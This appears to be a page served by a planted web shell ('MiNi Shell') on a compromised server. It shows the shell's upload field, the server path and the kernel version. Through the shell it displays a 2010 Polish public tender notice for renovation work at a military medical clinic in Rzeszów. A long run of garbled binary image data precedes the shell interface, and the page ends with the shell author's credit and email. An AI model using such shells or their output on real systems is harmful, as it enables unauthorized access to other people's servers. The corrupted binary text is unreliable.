JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100706/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100706/197114-N-2010.html

<p class="kh_header"><b>Rzeszów: Roboty budowlane  polegające na wykonaniu remontu wewnątrz budynku  wraz z dostosowaniem pomieszczenia Nr 19 do potrzeb rehabilitacji w budynku nr 1 WSPL SP ZOZ w Rzeszowie, usytuowanego na terenie zamkniętym kompleksu wojskowego 3200 na działce Nr 1244 położonej przy ul. Langiewicza  w Rzeszowie</b><br>
<b>Numer ogłoszenia: 197114 - 2010; data zamieszczenia: 06.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowa Specjalistyczna Przychodnia Lekarska SP ZOZ , ul. Langiewicza 4, 35-922 Rzeszów, woj. podkarpackie, tel. 17 852 87 57, faks 17 715 50 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wspl.rzeszow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane  polegające na wykonaniu remontu wewnątrz budynku  wraz z dostosowaniem pomieszczenia Nr 19 do potrzeb rehabilitacji w budynku nr 1 WSPL SP ZOZ w Rzeszowie, usytuowanego na terenie zamkniętym kompleksu wojskowego 3200 na działce Nr 1244 położonej przy ul. Langiewicza  w Rzeszowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są:  roboty budowlane  polegające na wykonaniu remontu wewnątrz budynku  wraz z dostosowaniem pomieszczenia Nr 19 do potrzeb rehabilitacji w budynku nr 1 WSPL SP ZOZ w Rzeszowie, usytuowanego na terenie zamkniętym kompleksu wojskowego 3200 na działce Nr 1244 położonej przy ul. Langiewicza  w Rzeszowie.  
Przedmiot zamówienia obejmuje 2 części, a to: 

Część nr I. Remont korytarza parteru i pomieszczeń po fizykoterapii wraz z  wymianą okien i drzwi	

Zakres robót w zakresie Części nr I uwzględnia wykonanie robót na korytarzu parteru oraz  w trzech pomieszczeniach po fizykoterapii w tym:
- demontaż wykładziny podłogowej w trzech pomieszczeniach i części korytarza,
- demontaż istniejących elementów instalacji elektrycznej w zakresie opraw oświetleniowych,
- wykonanie gruntowania podłoża istniejącego i wylewki samopoziomującej pod posadzki, w korytarzu i trzech pomieszczeniach,
- w przedsionku wejściowym skucie posadzki, wykonanie nowych podłoży i wylewki pod posadzkę,
- wykonanie sufitu podwieszonego kasetowego wraz z montażem opraw oświetleniowych  i niezbędnego zakresu oprzewodowania instalacji elektrycznej w remontowanych pomieszczeniach, w tym wykonanie czterech  opraw  oświetlenia awaryjnego,
- ułożenie terrakoty typu gres szkliwiony, antypoślizgowy wraz z cokolikiem w remontowanych pomieszczeniach,
- wykonanie lamperii olejnej do wysokości 2 m oraz pomalowanie ścian farbą emulsyjną powyżej lamperii do wysokości sufitu podwieszanego,
- wykonanie fartuchów z glazury przy umywalkach, kolor glazury do uzgodnienia z Zamawiającym, 
- demontaż okien drewnianych skrzynkowych, 
 - montaż 14 + 1 okien z PCV rozwierno-uchylnych w kolorze białym, o wymiarach 1470 x 2260 mm, z obróbką osadzenia - szkice okien do montażu na parterze wraz z wymiarami i innymi parametrami  zawiera   Załącznik Nr 2.2.1  do przedmiaru robót Nr 2.2,  
- wykonanie obróbek blacharskich (parapety zewnętrzne)
- demontaż parapetów i montaż nowych parapetów, 
- demontaż istniejących drzwi do gabinetów,
-  wykonanie montażu nowych, fabrycznie wykończonych drzwi w kolorze złoty dąb o szerokości 1,0 m z obróbką osadzenia, przy czym 4 szt. drzwi, wskazane przez Zamawiającego,  powinny posiadać obicie wygłuszające, jednostronne, wykonane z materiału typu skaj w kolorze jasny brąz, 
- wykonanie demontażu grzejników żeliwnych i montażu nowych grzejników panelowych, dwupłaszczyznowych z zaworami wyposażonymi w głowice termostatyczne,
- wykonanie obudowy na korytarzu instalacji wodociągowej CO,
- roboty porządkowe (w tym: wywiezienie gruzu na wysypisko), utylizacja zdemontowanych okien i drzwi na koszt Wykonawcy, zwrot do magazynu WAK zdemontowanych grzejników żeliwnych.
                    
Część nr II. Remont pomieszczeń zlokalizowanych na I piętrze dla potrzeb fizykoterapii 

Zakres robót w zakresie Części nr II uwzględnia wykonanie robót w trzech pomieszczeniach wchodzących w skład pomieszczenia nr 19 w tym:
- demontaż wykładziny podłogowej,
- demontaż istniejących elementów instalacji elektrycznej w zakresie opraw oświetleniowych,
- wykonanie gruntowania podłoża istniejącego i wylewki samopoziomującej pod posadzki, 
- demontaż istniejących drzwi w ściance działowej i zamurowanie tego otworu,
- wykucie otworu w ściance środkowego pomieszczenia do pomieszczenia obok wraz  z jego obróbką,
- wykonanie w pomieszczeniu środkowym ścianki z profili PCV pełnej do wysokości 2,0 m,  powyżej przeszklonej wraz  z montażem drzwi,
- wykonanie sufitu podwieszonego kasetowego wraz z wykonaniem instalacji elektrycznej z montażem opraw oświetleniowych, w tym wykonanie trzech opraw oświetlenia awaryjnego,
- ułożenie terrakoty typu gres szkliwiony, antypoślizgowy wraz z cokolikiem, 
-  wykonanie lamperii olejnej do wysokości 2 m  oraz pomalowanie ścian farbą emulsyjną powyżej lamperii do wysokości sufitu podwieszanego,
- wykonanie fartuchów z glazury przy umywalkach, kolor glazury do uzgodnienia,
- roboty porządkowe  (w tym wywiezienie gruzu na wysypisko, wywiezienie  złomu do magazynu WAK).

W zakres prac objętych przedmiotem zamówienia należy uwzględnić wszystkie czynności niezbędne do pełnego wykonania zamówienia, w zakresie określonym przedmiarem robót i specyfikacją techniczną wykonania i odbioru robót.

Szczegółowy zakres robót określają: specyfikacje techniczne wykonania i odbioru robót - Załączniki Nr 1.1, 1.2, 1.3, przedmiary robót - Załączniki nr 2.1, 2.2, 2.3 oraz szkice okien do montażu na parterze wraz z wymiarami i innymi parametrami  -  Załącznik Nr 2.2.1 do przedmiaru robót Nr 2.2  - stanowiące integralną część  specyfikacji istotnych warunków zamówienia .

Uwaga:

1. Zaleca się, aby Wykonawca przed opracowaniem oferty  dokonał wizji lokalnej remontowanego obiektu i jego otoczenia, a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej poniesie Wykonawca.
2.	Budynek położony jest na terenie zamkniętym kompleksu wojskowego 3200 na działce Nr 1244 położonej przy ul. Langiewicza  w Rzeszowie.
3.	Przed rozpoczęciem robót należy opracować plan BIOZ - zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. (Dz. U. Nr 120, poz. 1126);
4.	W cenie oferty należy uwzględnić wszystkie niezbędne zabezpieczenia miejsc prowadzenia robót przed osobami postronnymi;
5.	Roboty będą prowadzone w czynnym obiekcie użyteczności publicznej (przychodnia lekarska). Roboty winny być prowadzone w sposób zapewniający stały, bezpieczny dostęp (dojazd, wejście) pacjentów i pracowników przychodni przez wejście  główne lub zapasowe - boczne, uzgodnione z Zamawiającym.
6. Zamawiający wymaga, aby w pierwszej kolejności Wykonawca wykonał roboty remontowe w pomieszczeniach zlokalizowanych na I piętrze budynku przychodni..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.42.11.00-5, 45.21.11.50-0, 45.43.00.00-0, 45.43.11.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium do przedmiotowego postępowania.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek  dotyczący  posiadania  wiedzy i doświadczenia Zamawiający uzna za spełniony jeżeli Wykonawca przedłoży:

1) oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1

2) wykaz robót budowlanych odpowiadający swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia, wykonanych w ostatnich 5 latach, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie oraz dokumentów potwierdzających, że roboty te zostały wykonane z należytą starannością, potwierdzony referencjami. Wykazane roboty  nie mogą być o niższej wartości niż 80% wartości brutto złożonej oferty. Wykaz winien zawierać co najmniej jedną  robotę  budowlaną</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek  dotyczący  dysponowania odpowiednim potencjałem technicznym Zamawiający uzna za spełniony jeżeli Wykonawca przedłoży oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek  dotyczący  dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający uzna za spełniony jeżeli Wykonawca przedłoży:

1) oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1

2) wskaże  kierownika budowy, posiadającego uprawnienia budowlane z przynależnością do właściwej izby samorządu zawodowego,

3) oświadczenie, że  osoby, które będą uczestniczyć  w wykonywaniu zamówienia , posiadają uprawnienia budowlane,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek  dotyczący  sytuacji ekonomicznej i finansowej Zamawiający uzna za spełniony jeżeli Wykonawca przedłoży:

1) oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1, 

2) opłaconą polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej  z przedmiotem zamówienia, na kwotę nie mniejszą jak wartość ogółem brutto złożonej oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy, w przypadku i na warunkach określonych w : 
1) § 6 ust. 7 w związku z ust. 8 projektu umowy,
2) § 11 ust. 4 i 5 projektu umowy,
3) § 16  projektu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wspl.yoyo.pl/zpubliczne.html<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojskowa Specjalistyczna Przychodnia Lekarska
SPZOZ, 35-922 Rzeszów,  ul. Langiewicza 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2010 godzina 10:30, miejsce: Siedziba Zamawiającego, pokój nr 16, Piętro I.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji zamówienia: 
od daty przekazania terenu pod roboty do 29.10.2010 r., z zastrzeżeniem, iż w pierwszej kolejności Wykonawca winien wykonać roboty remontowe w pomieszczeniach zlokalizowanych na I piętrze budynku przychodni.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com